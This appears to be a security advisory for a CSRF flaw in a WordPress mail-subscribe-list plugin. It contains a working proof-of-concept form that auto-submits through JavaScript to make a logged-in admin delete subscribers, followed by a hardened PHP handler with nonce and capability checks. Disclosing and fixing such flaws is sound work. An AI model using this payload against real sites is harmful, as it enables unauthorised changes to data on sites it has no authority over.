The plugin does not have a CSRF check in place when deleting subscribed users, which could allow attackers to make a logged-in admin perform such an action and delete arbitrary users from the subscribed list.
<form id="test" action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
  <input type="text" name="sml_remove" value="1">
  <input type="text" name="rem[]" value="1">
  <input type="text" name="rem[]" value="4">
</form>
<script>
  document.getElementById("test").submit();
</script>
Daniel Ruf
Daniel Ruf
Yes
2022-05-26 (about 1 year ago)
2022-05-26 (about 1 year ago)
2023-02-22 (about 3 months ago)
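The missing check described above, sketched as a hardened delete handler. This is an added example, not the plugin's own code: the `sml_remove` and `rem[]` fields come from the proof of concept, while the function names, nonce action and field, table name and `id` column are assumptions.

```php
<?php
// Added example: hypothetical hardened handler for the subscriber delete action.
// Not the plugin's actual code. Names marked "assumed" are illustrative only.

const SML_NONCE_ACTION = 'sml_remove_subscribers'; // assumed nonce action
const SML_NONCE_FIELD  = 'sml_nonce';              // assumed hidden field name

// Call inside the admin <form> that lists subscribers, so every legitimate
// delete request carries a nonce bound to the current user and this action.
function sml_render_remove_nonce() {
    wp_nonce_field( SML_NONCE_ACTION, SML_NONCE_FIELD );
}

function sml_handle_remove() {
    if ( empty( $_POST['sml_remove'] ) ) {
        return; // not a delete request
    }

    // Authorization: only administrators may delete subscribers.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // CSRF check: terminates the request if the nonce is missing or invalid.
    // A form auto-submitted from another origin cannot supply a valid value.
    check_admin_referer( SML_NONCE_ACTION, SML_NONCE_FIELD );

    // Accept only an array of positive integer ids from rem[].
    $ids = array();
    if ( isset( $_POST['rem'] ) && is_array( $_POST['rem'] ) ) {
        $ids = array_filter( array_map( 'absint', wp_unslash( $_POST['rem'] ) ) );
    }

    global $wpdb;
    $table = $wpdb->prefix . 'sml'; // assumed table name
    foreach ( $ids as $id ) {
        // 'id' is an assumed primary key column.
        $wpdb->delete( $table, array( 'id' => $id ), array( '%d' ) );
    }
}
add_action( 'admin_init', 'sml_handle_remove' );
```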